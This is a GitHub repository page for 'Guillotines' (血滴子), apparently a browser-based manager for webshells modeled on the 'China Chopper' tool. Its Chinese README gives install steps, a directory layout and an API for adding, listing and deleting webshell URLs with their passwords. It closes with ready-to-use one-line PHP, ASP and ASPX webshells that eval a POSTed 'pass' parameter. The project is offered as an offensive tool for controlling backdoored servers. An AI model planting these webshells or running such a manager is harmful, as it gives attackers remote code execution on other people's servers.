Skip to content

s270987763/Guillotines

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

110 Commits
App
App
 
 
Core
Core
 
 
Public
Public
 
 
agent
agent
 
 
.gitignore
.gitignore
 
 
README.md
README.md
 
 
guillotines.sql
guillotines.sql
 
 
index.py
index.py
 
 
ip.txt
ip.txt
 
 
passwd.py
passwd.py
 
 
start.sh
start.sh
 
 
血滴子架构图.xmind
血滴子架构图.xmind
 
 

Repository files navigation

项目介绍

为了更方便的而又跨平台的使用“中国菜刀”,我们创建了这个项目。该项目是Web版的"中国菜刀",我们暂时取名叫“血滴子”。欢迎感兴趣的朋友一起交流学习。

开发成员及负责方面

MXi4oyu(Python后端,用于处理“管理器对shell的核心操作”)。Email:[email protected]

Black-Hole(JavaScrip前端,用于处理“管理器”在浏览器下的显示)。Email:[email protected]

安装方法

  1. pip install beaker
  2. pip install pymysql
  3. pip install sqlalchemy
  4. pip install bottle_sqlalchemy
  5. pip install jinja2

项目的目录结构

www 根目录
├─App               应用目录
│  ├─Common             公共函数库
│  ├─Conf               配置目录
│  ├─Controller         控制器目录
│  ├─Model              模型目录
│  ├─View               视图目录
├─Core              核心目录
├─Public            静态资源目录
│  ├─js                 javascript文件目录branch
│  │  ├─branch          自定义javascript文件
│  │  ├─library         第三方javascript插件
│  ├─css                css文件目录
│  │  ├─branch          自定义css文件
│  │  ├─library         第三方css插件
│  ├─less               css引擎less文件目录
│  │  ├─branch          自定义less文件
│  ├─fonts              字体目录
│  ├─image              图像目录
├─index.py          入口文件
├─ip.txt            记录ip地址
├─passwd.py         生成密码
└─guillotines.sql   数据库文件

API接口说明

获取webshell总数

地址:   /RootApi/webshell/total
方式:   GET
参数:   
类型:   Number
示例:
512

获取webshell列表

地址:   /RootApi/webshell/list/<page:int>
#每页显示30条记录
方式:   POST
参数:   无
类型:   Json
示例:
{
	"type":"success",
	"info":[
		{
			"id":"1",
			"url":"http://github.com/1.php",
			"category":"PHP",
			"time":"2016-8-31 22:58:28"
		},
		{
			"id":"2",
			"url":"http://google.com/x.php",
			"category":"PHP",
			"time":"2016-8-31 22:59:02"
		}
	]
}

添加单个webshell

地址:   /RootApi/webshell/add
方式:   POST
参数:
{
	url:'url地址',
	password:'webshell的密码',
	category:'PHP'
}
类型:   Json
示例:
{
	"type":"success"
}

删除单个webshell

地址:   /RootApi/webshell/del
方式:   POST
参数:
{
	url:'url地址',
}
类型:   Json
示例:
{
	"type":"success"
}

注意事项

只有当API的类型为Json格式时才会有错误信息,而且所有的错误信息都按照以下格式。

{
	"type":"error",
	"info":"错误信息"
}


####血滴子一句话
PHP: <?php @eval($_POST['pass']);?>
ASP: <%eval request("pass")%>
ASPX: <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>

About

Web端WebShell管理器

Resources

Readme
Activity

Stars

2 stars

Watchers

1 watching

Forks

2 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors

Languages